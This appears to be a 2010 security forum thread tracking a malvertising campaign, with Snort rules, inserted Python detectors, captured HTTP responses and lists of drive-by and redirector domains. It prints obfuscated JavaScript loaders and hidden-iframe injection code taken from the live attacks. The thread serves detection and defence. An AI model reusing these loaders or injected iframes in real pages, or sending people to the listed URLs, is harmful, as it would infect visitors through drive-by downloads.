http://wepawet.iseclab.org/view.php?hash=a47d8bc28e859963220c777818a938a1&type=js
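As an added example (not code from the thread), here is a Python rendering of the two client-side rules above, run over a few constructed proxy log lines; it also decodes the id suffix the way the fingerprint script above builds it (n/j for Java off/on, trailing p for a PDF plugin). The log line format and the example.invalid hosts are assumptions.

```python
import re
from urllib.parse import unquote

# Mirrors the PCRE in the "POST to SEO Exploit Kit" rule above: id=<32 hex>,
# then "&" (raw or URL-encoded as %26), then the plugin flags built by the
# fingerprint script: n/j = Java disabled/enabled, trailing p = PDF plugin present.
POST_ID_RE = re.compile(r"id=([a-f0-9]{32})(?:&|%26)(np|jp|n|j)", re.I)

# Mirrors the uricontent in the "Adobe Exploited Check-In" rule above.
READER_CHECKIN_RE = re.compile(r"\.php\?&&reader_version=([^&\s]*)", re.I)


def classify_request(method, uri, body=""):
    """Return a verdict dict for a client request matching either rule, else None."""
    method = method.upper()
    if method == "POST" and ".php" in uri.lower():
        m = POST_ID_RE.search(body)
        if m:
            flags = m.group(2).lower()
            return {
                "rule": "MALVERTISING POST to SEO Exploit Kit",
                "id": m.group(1).lower(),
                "java_enabled": flags.startswith("j"),
                "pdf_plugin": flags.endswith("p"),
            }
    if method == "GET":
        m = READER_CHECKIN_RE.search(uri)
        if m:
            return {
                "rule": "MALVERTISING Adobe Exploited Check-In",
                "reader_version": unquote(m.group(1)),
            }
    return None


# Constructed log lines (assumed format: "<client> <method> <uri> [<post body>]").
# The first line reuses the POST body captured in the post above; the
# example.invalid hosts are placeholders, not real observations.
LOG_LINES = [
    "10.0.0.5 POST http://fjoty.com/pw/za_pumsvx.php id=adbac98ea8cc4816ae7652f9ade94ac6%26np",
    "10.0.0.7 GET http://example.invalid/chk.php?&&reader_version=9.3.0",
    "10.0.0.9 POST http://example.invalid/login.php user=alice&id=1234",
    "10.0.0.5 GET http://example.invalid/index.php?page=1",
]


def scan_log(lines):
    """Apply both rules to each log line; return (client, verdict) pairs for the hits."""
    hits = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) < 3:
            continue  # malformed line, skip it
        client, method, uri = parts[:3]
        body = parts[3] if len(parts) == 4 else ""
        verdict = classify_request(method, uri, body)
        if verdict is not None:
            hits.append((client, verdict))
    return hits


if __name__ == "__main__":
    for client, verdict in scan_log(LOG_LINES):
        print(client, verdict)
```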
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 24, 2010, 09:34:14 pm
Exploit domain of the day:

fruuf.com
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 25, 2010, 06:12:03 pm
Domains recap for the last few weeks.

Malvertising Domains (Serve up Obfuscated JavaScript that redirects to check-in sites):


Check-in sites that redirect to SEO Exploit drive by sites:


SEO Exploit drive by sites:


Domains referring clients to the malicious advertising services:
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 25, 2010, 08:13:20 pm
This Snort sig helps tracking the new drive by domains quite effectively:

Code: [Select]
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MALVERTISING hidden iframe served by nginx"; flow:established,to_client; content:"Server\: nginx"; nocase; offset:15; depth:15; content:"<iframe src="; content:"style=\"visibility\:hidden\;\" width=\"1\" height=\"1\"></iframe>"; classtype:bad-unknown; sid:5600049; rev:1;)
Server response signature was developed from:

Code: [Select]
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 24 Jun 2010 00:35:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 137

<html>
<body>
<iframe src="http://fjoty.com/pw/za_pumsvx.php" style="visibility:hidden;" width="1" height="1"></iframe>
</body>
</html>

False positives have been non-existent so far for the past few hours.
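As an added example (not the thread's own tooling), the Python below applies both server-response rules from this thread, the packed eval(p,a,c,k,e,d) rule from the June 22 post and the hidden-iframe rule just above, to raw HTTP responses, dechunking the body first since the packed sample was sent chunked. The samples are constructed from the captures quoted in the thread; the "benign" one shows the false-positive filter the author relied on (nginx serving packed JS with the correct Content-Type).

```python
import re

# Marker from the packed-JavaScript rule (sid 5600046 above).
PACKED_MARKER = b"eval(function(p,a,c,k,e,d)"

# Content matches from the hidden-iframe rule (sid 5600049 above); the URL between
# them is captured so the drive-by host can be pulled out for blocking.
HIDDEN_IFRAME_RE = re.compile(
    rb'<iframe src="([^"]+)" style="visibility:hidden;" width="1" height="1"></iframe>',
    re.I,
)


def dechunk(body):
    """Reassemble a chunked transfer-encoded body (the packed sample above was chunked)."""
    out = b""
    while body:
        size_line, _, rest = body.partition(b"\r\n")
        try:
            size = int(size_line.split(b";")[0].strip(), 16)
        except ValueError:
            break  # truncated or malformed chunk header: keep what we have
        if size == 0:
            break
        out += rest[:size]
        body = rest[size + 2:]  # skip the chunk data and its trailing CRLF
    return out


def parse_response(raw):
    """Split a raw HTTP response into (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    if headers.get(b"transfer-encoding", b"").lower() == b"chunked":
        body = dechunk(body)
    return lines[0], headers, body


def inspect_response(raw):
    """Return the descriptions of the rules above that this response would trigger."""
    _, headers, body = parse_response(raw)
    alerts = []
    server = headers.get(b"server", b"").lower()
    ctype = headers.get(b"content-type", b"").lower()
    if not server.startswith(b"nginx"):
        return alerts  # both rules are keyed on the nginx Server header
    # Packed JS is common in legitimate libraries; the rule only fires when it is
    # mislabelled as text/html, which is the author's false-positive filter.
    if ctype.startswith(b"text/html") and PACKED_MARKER in body:
        alerts.append("packed eval(p,a,c,k,e,d) JavaScript served as text/html")
    m = HIDDEN_IFRAME_RE.search(body)
    if m:
        alerts.append("hidden 1x1 iframe -> " + m.group(1).decode("ascii", "replace"))
    return alerts


def _response(headers, body):
    return headers + b"\r\n\r\n" + body


def _chunked(payload):
    return b"%x\r\n%s\r\n0\r\n\r\n" % (len(payload), payload)


# Constructed samples modelled on the captures in this thread.
# 1) The hidden-iframe response quoted above (fjoty.com drive-by).
SAMPLE_IFRAME = _response(
    b"HTTP/1.1 200 OK\r\nServer: nginx/0.7.65\r\nContent-Type: text/html\r\n"
    b"Connection: keep-alive\r\nX-Powered-By: PHP/5.2.13",
    b'<html>\n<body>\n<iframe src="http://fjoty.com/pw/za_pumsvx.php" '
    b'style="visibility:hidden;" width="1" height="1"></iframe>\n</body>\n</html>\n',
)
# 2) Packed JS mislabelled as text/html and sent chunked, like the hex dump above.
SAMPLE_PACKED = _response(
    b"HTTP/1.1 200 OK\r\nServer: nginx/0.7.65\r\nContent-Type: text/html\r\n"
    b"Transfer-Encoding: chunked",
    _chunked(b"eval(function(p,a,c,k,e,d){}('',62,0,''.split('|'),0,{}))"),
)
# 3) The same packed code from nginx but correctly labelled: a legitimate library.
SAMPLE_BENIGN = _response(
    b"HTTP/1.1 200 OK\r\nServer: nginx/0.7.65\r\nContent-Type: application/javascript",
    b"eval(function(p,a,c,k,e,d){}('',62,0,''.split('|'),0,{}))",
)

if __name__ == "__main__":
    for name, sample in [("iframe", SAMPLE_IFRAME), ("packed", SAMPLE_PACKED), ("benign", SAMPLE_BENIGN)]:
        print(name, inspect_response(sample))
```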
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 28, 2010, 04:54:58 pm
Malvertising Servers:
view.atdmt.com.requild.com

Check-in/Redirectors:
trendanalytics2010.co.cc
vcztuokghrtq.co.cc

New drive-bys (change/rotate every 24 hours or so):
http://uytim.com/vz/tbbncwdv_.php - Saturday
http://kobqq.com/vc/vcc_vdz.php - Sunday
http://yopte.com/zs/bzkvfl.php - Monday (Today)
http://yopte.com/wb/adbplhr.php

More info:
Drive bys are single shot based on source IP (then they redirect to google.com on subsequent visits, even after a domain name change). Also, the JavaScript is broken and will not execute in IE8 unless you are using compatibility mode.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: MysteryFCM on June 28, 2010, 08:31:37 pm
Nice catch :)

/edit

Do you have the full URL for vcztuokghrtq.co.cc please? (doesn't resolve here, and nothing on the search engines for it)

/edit 2

And this one please;

view.atdmt.com.requild.com
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 29, 2010, 03:07:44 pm
Yes indeed, here ya go.

Quote
Nice catch :)

/edit

Do you have the full URL for vcztuokghrtq.co.cc please? (doesn't resolve here, and nothing on the search engines for it)

URL:  http://vcztuokghrtq.co.cc/north.php?n=cust12
Referrer: http://www.fixya.com/support/p1133609-orange_steelcore_9_surfboard_lock_snowb

Response:

Code: [Select]
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 27 Jun 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 135
<html>
<body>

<iframe src="http://kobqq.com/vc/vcc_vdz.php" style="visibility:hidden;" width="1" height="1"></iframe>

</body>
</html>



Quote
And this one please;

view.atdmt.com.requild.com

URL: http://view.atdmt.com.requild.com/MON/jview/dlnkkmgr124536131mon/direct/01/?rn=11386816&click=
Referrer: http://mac.softpedia.com/get/Math-Scientific/Best-Pair-II.shtml
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 29, 2010, 03:12:49 pm
New stuff for today:

Malvertising:
http://js.zedo.com.rc1.hiskweb.com/cr/j/cd/?rt=47210&sid=223417424&m=5171&ts=31&d=x&ctc=31&tm=sc

Redirect:
http://globalsearch5.co.cc/amiga.php?n=cust12

Exploit:
http://nhytx.com/wt/_duusz.php
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: MysteryFCM on June 29, 2010, 06:16:27 pm
Cheers :)
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: SysAdMini on June 29, 2010, 06:19:25 pm
Do I need a special referer for

Code: [Select]
js.zedo.com.rc1.hiskweb.com/cr/j/cd/?rt=47210&sid=223417424&m=5171&ts=31&d=x&ctc=31&tm=sc
??

Script decodes to
Code: [Select]
<a href='http://www.raffaello-network.com/' target='_blank'><img src='http://js.zedo.com.rc1.hiskweb.com/banners/load.php?id=223417424' border='0' ></a>
Do you find more?
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 29, 2010, 08:20:03 pm
The obfuscated code I have from pcap from the js.zedo.com.rc1.hiskweb.com is as follows:

Code: [Select]
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 3M={5f:q(m,e,n){m=12.3F(m);5 R=[],M=\'\';x(5 i=0;i<m.j;i+=3){5 11=\'1\';x(5 h=0;h<3;h++){v(i+h<m.j){N=8.o(m.f(i+h))-30;v(N.j<2)N=\'0\'+N}3K 5a;11+=N}R.2t(11+\'1\')}x(5 k=0;k<R.j;k++){5 P=8.13(R[k],e,n);5 L=P.X(16);V(L.j<7)L=\'0\'+L;M+=L}M=M.3R(3P 3O(\'^+|+$\',\'g\'),\'\');b 8.2r(M)},3N:q(c,d,n){c=8.2p(c);5 G=[],U=\'\',18=\'\';x(5 i=0;i<c.j;i+=7)G.2t(c.Y(i,7));x(5 u=0;u<G.j;u++)v(G[u]==\'\')G.5b(u,1);x(5 u=0;u<G.j;u++){5 P=8.13(Z(G[u],16),d,n)+\'\';U+=P.Y(1,P.j-2)}x(5 u=0;u<U.j;u+=2)18+=8.a(Z(U.Y(u,2),10)+30);b 12.3Q(18)},o:q(a){b t.o(a)},a:q(2u){b t.a(2u)},17:q(g,l){b g-(l*58.59(g/l))},13:q(2s,14,19){5 W=1,i=0,O=2s;V((14>>i)>0){v(((14>>i)&1)==1)W=8.17((W*O),19);O=8.17((O*O),19);i++}b W},2r:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i+=2){5 I=Z(\'\'+B.f(i)+B.f(i+1),16).X(10);J+=t.a(I)}b J},2p:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i++){5 I=t.o(B.f(i)).X(16);J+=I.j==2?I:\'0\'+I}b J}};5 
t={F:{3J:{2v:2q,2B:2w,2z:2A,2y:2x,2n:2o,2e:2d,2b:2c,2a:29,2g:2f,2m:2l,2j:2k,2i:2h,2D:2C,2Y:2X,28:2W,2U:2T,31:2Z,35:36,32:34,2S:33,2I:2R,2H:2J,2E:2G,2K:2F,2Q:2L,2O:2P,2N:2M,1M:37,1r:1p,1t:1u,1q:1x,1w:1v,1C:1B,1z:1A,1y:1o,1m:1D,1f:1d,1a:1c,1e:1b,1l:1n,1k:1g,1h:1j,1s:1i,1Y:27,1X:1Z,1U:1W,20:1V,26:21,24:25,1E:22,1T:23,1J:1S,1I:1K,1F:1H,1L:1G,1Q:1R,1N:1P,2V:1O,4v:3c,38:4r,4u:4t,4p:4s,4w:4q,4A:4B,4y:4z,4n:4o,4e:4d,4b:4c,4a:49,4g:4f,4m:4l,4D:4k,4h:4j,4C:4i,4Y:4H,4X:4Z,4U:4W,51:4V,52:55,53:56,50:54,4I:4S,4T:4J,4E:4G,4K:4F,4Q:4L,4P:4R,4M:4O,4x:4N,3t:47,3s:3u,3p:3r,3v:3q,3B:3w,3z:3A,3y:3x,3n:3o,3e:3d,3b:48,3a:39,3g:3f,3m:3l,3j:3k,3i:3h,3D:3C,3Z:3Y,3W:3X,3V:3U,41:40,45:46,42:44,3T:43,3I:3S},3H:{2q:2v,2w:2B,2A:2z,2x:2y,2o:2n,2d:2e,2c:2b,29:2a,2f:2g,2l:2m,2k:2j,2h:2i,2C:2D,2X:2Y,2W:28,2T:2U,2Z:31,36:35,34:32,33:2S,2R:2I,2J:2H,2G:2E,2F:2K,2L:2Q,2P:2O,2M:2N,37:1M,1p:1r,1u:1t,1x:1q,1v:1w,1B:1C,1A:1z,1o:1y,1D:1m,1d:1f,1c:1a,1b:1e,1n:1l,1g:1k,1j:1h,1i:1s,27:1Y,1Z:1X,1W:1U,1V:20,21:26,25:24,22:1E,23:1T,1S:1J,1K:1I,1H:1F,1G:1L,1R:1Q,1P:1N,1O:2V,3c:4v,4r:38,4t:4u,4s:4p,4q:4w,4B:4A,4z:4y,4o:4n,4d:4e,4c:4b,49:4a,4f:4g,4l:4m,4k:4D,4j:4h,4i:4C,4H:4Y,4Z:4X,4W:4U,4V:51,55:52,56:53,54:50,4S:4I,4J:4T,4G:4E,4F:4K,4L:4Q,4R:4P,4O:4M,4N:4x,47:3t,3u:3s,3r:3p,3q:3v,3w:3B,3A:3z,3x:3y,3o:3n,3d:3e,48:3b,39:3a,3f:3g,3l:3m,3k:3j,3h:3i,3C:3D,3Y:3Z,3X:3W,3U:3V,40:41,46:45,44:42,43:3T,3S:3I}},o:q(a,r){r=r||\'3J\';v(!8.F[r])b 3G;a=a.5g(0);b(a 3E 8.F[r])?8.F[r][a]:a},a:q(o,r){r=r||\'3H\';v(!8.F[r])b 3G;o=(o 3E 8.F[r])?8.F[r][o]:o;b 5m.5h(o)}};5 12={w:"5l+/=",3F:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;V(i<p.j){H=t.o(p.f(i++));C=t.o(p.f(i++));D=t.o(p.f(i++));K=H>>2;E=((H&3)<<4)|(C>>4);z=((C&15)<<2)|(D>>6);y=D&5i;v(3L(C))z=y=S;3K v(3L(D))y=S;s=s+8.w.f(K)+8.w.f(E)+8.w.f(z)+8.w.f(y)}b s},3Q:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;p=p.3R(3P 
3O(\'[^A-5j-5e-9+/=]\',\'g\'),\'\');V(i<p.j){K=8.w.T(p.f(i++));E=8.w.T(p.f(i++));z=8.w.T(p.f(i++));y=8.w.T(p.f(i++));H=(K<<2)|(E>>4);C=((E&15)<<4)|(z>>2);D=((z&3)<<6)|y;s=s+t.a(H);v(z!=S)s=s+t.a(C);v(y!=S)s=s+t.a(D)}b s}};5d(3M.3N(\'57\',\'5c\',\'5k\'));',62,333,'|||||var|||this||chr|return||||charAt||||length|||||ord|input|function|dir|output|ASCII||if|alphabet|for|enc4|enc3||str|chr2|chr3|enc2|translations|decryptarray|chr1|bte|result|enc1|chunk|coded|tmpstr|basepow2|resultmod|len|asci|64|indexOf|deencrypt|while|accum|toString|substr|parseInt||tmpasci|BASE64|powmod|exp|||mod|resultd|modulus|1028|175|170|168|1031|1025|179|1169|184|180|1110|1030|1168|178|163|156|1115|1114|1105|1116|157|159|1119|158|1032|1118|162|161|1038|165|1040|1044|197|196|1043|1042|195|1045|8250|1047|200|199|1046|198|194|1041|1112|189|188|1108|8470|186|1029|190|192|193|1111|191|1109|185|1035|135|8225|8224|134|133|8230|136|8364|139|8249|1033|138|137|8240|8222|132|strhex|128|hexstr|base|push|num|1026|129|131|1107|8218|130|1027|140|1034|8211|151|150|8226|8221|149|8212|152|154|1113|8482|153|65533|148|8220|143|1039|1048|142|141|1036|144||1106|8217|147|146|8216|145|155|1050|242|1090|1089|201|240|1088|243|1091|246|1094|1093|245|244|1092|1087|239|1082|235|234|1081|1080|233|1083|236|238|1086|1085|237|1084|247|1095|in|encode|null|php2js|1103|js2php|else|isNaN|RSA|decrypt|RegExp|new|decode|replace|255|1102|250|1098|1097|249|248|1096|251|1099|1101|254|253|1100|252|232|241|211|1059|1058|210|209|1057|212|1060|1063|216|215|214|213|1061|1056|208|1052|205|202|204|203|1051|1049|1053|1079|1055|207|1054|206|1064|1062|1074|227|226|217|1072|225|1075|228|1078|231|230|1077|1076|229|224|1073|1067|220|219|1066|1065|218|1071|1068|1069|1070|223|221|222|14278a4166c9380ac458311916360d320202bb86b930868de0fab1f2103f8062e6100a30868de0fab1f2103f8062e6100a1e1722c12cfabc32bd5671aa08a72014a7f23058af0444a601b9232800f0a0012f9519324b1471b9232800f0a00288d4cd324b1471971cdf196c8d51926ae031d1e0e34408e81aa42311926ae031d1e0e34408e81aa423119
26ae031d1e0e34408e82e01ebe13b5b8921e59ff0c262410dad1c80197aa509dbe6215669ff17a560e2d1f91900625f80d2722717a560e039bb3c00625f825ae78e0e13cb21258e1404e379f10fe89712c00862dc720527c717d02c034f1470e7d06ecd6c1d6e1030d27227197cbeb0fab1f2103f8062e6100a30868de0fab1f2103f8062e6100a1e1722c12cfabc32bd5671aa08a72014a7f23058af0444a601b9232800f0a0012f9519324b1471b9232800f0a00288d4cd324b1472b22812298e48c1abe7fc1c31a481b8dd2524ae18d243aa620eaad043228f2b12c008633e1bc207989712cfa53c1aef996244ecc4004e3291971cdf1dc7bc427b39b72428cd33120e0c0a4ccea0b6abce07781090e5ea6a113ccd41b8b2753056d4b2f823b31418a04276339c34708480723be72e071d33103e701bb42351191e681bf36e21ba9ced11cc9ee2fb918b1db51eb15c7ea72d0cd8413178ce08b7e312efa6e928d72fb1fe79532aabf0814bf52e039357c34408e817f76b20f0fc26156a41018b7aac07b87481f9389c034249a0651f4a0221107042916b26e5abc1aa08a70104be22b2804008c51d217f6eaf2ef39b507c89d621041a700a07af24d338c0c618e123333eb1eaf87c0c9208524d564b200c89720ca440299b66519b25fc2a43a6021aa5ca2bf802405076a109f4cb11205da01e1443e0a03dcb2a3e93d1fc5db5271ccf9139dc3d28188b509fcf13127045b1a75ea029a682e1fd7ae906d11191075ecd28d72fb0e0ead72cf1040037ad36149210d2216a20351d2a01fd00c00210f432d9526533aaed8318bbad250603f105cc50023fef533fc80f2f13b5a2bd059c2bdac3d27a2d5d0f81d15047a6f40a96fe62c17b38250603f048cb38155aa5420e72c1306b9af104c3fe1cb244b1c5b357296b80e126c9e90a3d4bf1d441f21b735cd2f503d60728f5d26560f01d6d73a281d73c2761a8b160ebd50c1b0b701e29692953b551afbffc28c8c71338fdbb1e9d32b032ba711871ce2097a8c11c4ae441ffa2ee200e857240653a053497f1319db11eed7d32cfa53c1ec4bb0159d30830a91b90b6b4a9003e5382da7583252207b0a739100154a0f0ab92322c7d80504ef3430c7559401824f909a5b53089b47c0f839fe10a67e50cca16601b98b40f682d12ca3b7a32dd3e92b18a2e21af0391dc410c07a89c2330ae0a1f859e30ecd77d039357c17c06041e223e224c88df16ebeec01f36c21832aca1a1bf831c750f83243dab10224cc1213b192af495002b3dd832b5c500eb558017d0901265d6a42bf802420e72c120b05220d0e7d01c9f39f1e33b392b2bc4b197d4b433dfa9a2ac25092be16141610f3518026cf16f9a32136829f2ee53d129b255f20de0c30141d0c
2e6100a234293d16a743a22a72a92f171c331d29f91e33b3912d66721bc1c621d4e6b909510b233592100709a1d19e1a2a0659cd72200785349135f317b72a113a30829a682e084b0af24eb2261aec0c125b2b5909c6c6404ba64a0c864b312c5e1b18165871081ac90cfb6380c640d82c2c39f2392b342d20f892420fe2217c9a306298f114ce3960d3c68d01f175f2f558592a6c7c226e045321252ec05124cd2d3783620d9f461ec13152779a4a1c7680f222522901f175f1fe6684191bb5a296b80e0abb7f423d8c4c09e812d112f6ca2ebea001a117e413d302c1b3e3c41fd00c02be03ee127e0d2020c8430a53352137d7b21f55e2b347c220152ff8613774d6032ba711871ce2097a8c11c4ae441ffa2ee200e857240653a053497f1319db11eed7d32cfa53c1ec4bb0205d17822d15782bc2b9907d51d603aeb8820823ec2c8aafa2948ca918a700b0c859be096c52804263a32e20d2804012ab06a124908afab7299a8ba2ea0ec91e2528d115dcd107f9c7f33b6cc801f175f172f5ce12cfabc040c00e04ad1711d2a69b12a53152f34e2d281d73c1ec4bb00f5d6ba2d982a41bbb17621659d81c5b3571d88ad931954b71add61e1cea70a06591061c0c8821cf8ea2010d47d23db96b21424b4210dda62e4dbf106cc8b51fc5db502ba6f82b7d5b21aaa55f1cfeb090ac92603111ffd2eb7cd217abdb32be03ee044c1a6018269021c777f2123c2022e2f411e6a3a923ed37220002801792714306b9af0d0e7d01c9f39f1e33b3934941e00a53352137d7b21f55e2b347c2202421be3|Math|floor|break|splice|29819039|eval|z0|encrypt|charCodeAt|fromCharCode|63|Za|55721041|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|String'.split('|'),0,{}))

This causes two hidden iframes. The first, to trendanalytics2010.co.cc, leads you to the drive-by; the second just keeps stats/tabs on clients hitting the malvertising domains:

Code: [Select]
<iframe width="1" height="1" style="visibility: hidden;" src="http://trendanalytics2010.co.cc/colombo.php?n=cust1">
<iframe width="1" height="1" style="visibility: hidden;" src="http://js.zedo.com.rc1.hiskweb.com/stats_js_e.php?id=223417424">

**EDIT**

I uploaded the sample I posted to JSUnpack and it validates it. The report is as below:
http://jsunpack.jeek.org/dec/go?report=8442c03b07e2de6a49068fb3e5b1d1ae9bf7e3fa
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on July 01, 2010, 05:40:38 pm
Drive By:
http://hkuos.com/vd/ncdka.php - Yesterday
http://polkj.com/ch/jqpqzlq.php - Today

Redirectors:
http://ailerry.co.cc/kleopatra.php?n=cust12 - Yesterday
http://almodial.co.cc/gtrsp.php?n=cust12 - Today
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on July 02, 2010, 05:42:56 pm
Drive By:
http://qxitr.com/fv/_hsj.php

Redirectors:
http://chelleak.co.cc/gtrsp.php?n=cust12
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on July 06, 2010, 08:32:19 pm
Seeing some stuff move into a new netblock recently:

89.248.174.0/23

Malvertising servers:
view.atdmt.com.risoton.com - jsunpack report here (http://jsunpack.jeek.org/dec/go?report=be928c863aaeb55d18563f9016300d3d2dfe9fa9)
view.ads.cheratic.com
view.atdmt.com.tessane.com


Redirector:
http://benzele.co.cc/jakomo.php?n=cust1

The driveby/exploit domains remain within the 194.8.250.0/24 netblock.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on July 06, 2010, 09:01:09 pm
More domains active in the malvertising netblock:

media.fastclick.net.timoton.com

Haven't seen the hidden iframes inside of this obfuscated javascript; it will probably be switched on at a later date given the netblock it lives in. Also MSN/Live.com are currently using this advertising service.

**EDIT**
And it's already swapped over to redirecting to drive-bys:
http://jsunpack.jeek.org/dec/go?report=8f1e9fa5b9651e1fdb135997cd15f0d8ec42a014

http://mildron.co.cc/jiqasdir.php?n=cust11
http://jgtee.com/ww/wnuajoz.php
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on July 13, 2010, 10:19:00 pm
URLs are changing up slightly today:

http://statpc.in/x/?src=sftmaster2&id=av1&o=o

Net has moved for the drive-bys as well, to another already known bad actor:

91.188.59.55
http://www.db.ripe.net/whois?form_type=simple&full_query_string=&searchtext=91.188.59.55

Different drive-by style site as well; this is more of a scanner page.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on July 14, 2010, 05:24:58 pm

http://tosoft.in/x/?src=sftmaster2&id=av5&o=o
http://resolvenews.in/x/?src=sftmaster2&id=av5&o=o
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on August 06, 2010, 05:37:24 pm
facilitatedigital.net

For the last day or so, people logging into mail.live.com, menshealth.com and a bunch of others have been getting malvertising redirecting them to drive-by sites. However, they have been flipping the switch on and off for redirecting to the drive-bys.

Example URL that serves up obfuscated javascript that does not contain the drive by:

http://facilitatedigital.net/rc/js/ld/?fn=11a&sid=1112535&dpn=75zh1&fp=n&ctp=y9i12

Response:
Code: [Select]
HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Thu, 05 Aug 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 1087


var MPvpZm=new String('evafeds'.substr(0,3)+'bruller'.substr(3,1)); // 'eva'+'l' = "eval"
var GsZiFN=this;
var kkMsoVj=GsZiFN [MPvpZm]; // window["eval"], fetched through the global object
var oxdh=new String('unescape');
var ugoi=GsZiFN [oxdh]; // window["unescape"]
var HIhVN='6J/6JA6Jn6Qk6JR6Jk6J16Q/6a16QQ6Qa6JU6Q/6Jk6aM6Qk6J16Jk6Qn6Jn6J_6Q96Jk6aM6aa6ak6nn6/n6J_6a96JM6Qa6Jk6JJ6nR6aQ6JM6Q/6Q/6Q96ak6nn6/_6ak6na6/J6ak6na6/J6QQ6QQ6QQ6a16JJ6JG6JU6JQ6JM6Q/6J16Jk6Q/6QQ6JA6Qa6Jl6a16Jn6JA6JR6ak6na6/J6aQ6a96Q/6J_6Qa6JQ6Jk6Q/6nR6aQ6kA6Ja6JG6J_6J16Jl6aQ6ak6nn6/k6ak6nn6/n6JU6JR6JQ6a96Qn6Qa6Jn6nR6aQ6JM6Q/6Q/6Q96nP6aA6aA6JJ6J_6Jn6JU6JG6JU6Q/6J_6Q/6Jk6J/6JU6JQ6JU6Q/6J_6JG6a16J16Jk6Q/6aA6Ja6J/6Ja6aA6/J6JG6JU6JQ6JM6Q/6/16Jk6Q/6aA6n_6nJ6n96QM6nJ6n96n96kA6n96n/6a16JP6Q96JQ6aQ6a96Ja6JA6Qa6J/6Jk6Qa6nR6aQ6n96aQ6a96ak6nn6/k6ak6nn6/n6aA6J_6ak6nn6/k6aa6aU6aU6nl69P69P69P'; // encoded payload
var _Mge='WXfmR9Fs6OV3DTZ4QyYcL-G=txvz_ajw207.EN?&JHMdKUk5PB:8Ai/luIop%CS1benrhqg'; // output alphabet
var XOy='F8LSEUA3JzbnRio/0HBe.&jdKO%Wr:cxa9Qp1ut-DysgT=IkmlZMPV7Y4v?26Gh_CwX5qfN'; // lookup alphabet
var cYS='';var _eTy;var irIk;
// per payload character: its position in XOy, then the _Mge character at that position; characters not in XOy are dropped
for(_eTy=0;_eTy<HIhVN.length;_eTy++){ irIk=XOy.indexOf(HIhVN.charAt(_eTy));if(irIk>-1){ cYS+=_Mge.charAt(irIk);}}
kkMsoVj(ugoi(cYS)); // eval(unescape(decoded))


Then some of the advertising servers in the same netblock (media.topsann.com) will *sometimes* serve up the obfuscated javascript that redirects to the drive-by:

JSUnpack report: http://jsunpack.jeek.org/dec/go?report=812b87a1ed2c803ceb6b81671f99107280d2d241

URL: http://media.topsann.com/ad/js/ld/?chn=22a&bfx=16tz516&sid=176552&zed=81963&fl=no&rtr=y

Response:
Code: [Select]
HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Fri, 06 Aug 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 3652


var bibak=new String('evafeds'.substr(0,3)+'bruller'.substr(3,1)); // 'eva'+'l' = "eval"
var Thhx=this;
var EDTmvV=Thhx [bibak]; // window["eval"]
var sxMKjk=new String('unescape');
var Uzym=Thhx [sxMKjk]; // window["unescape"]
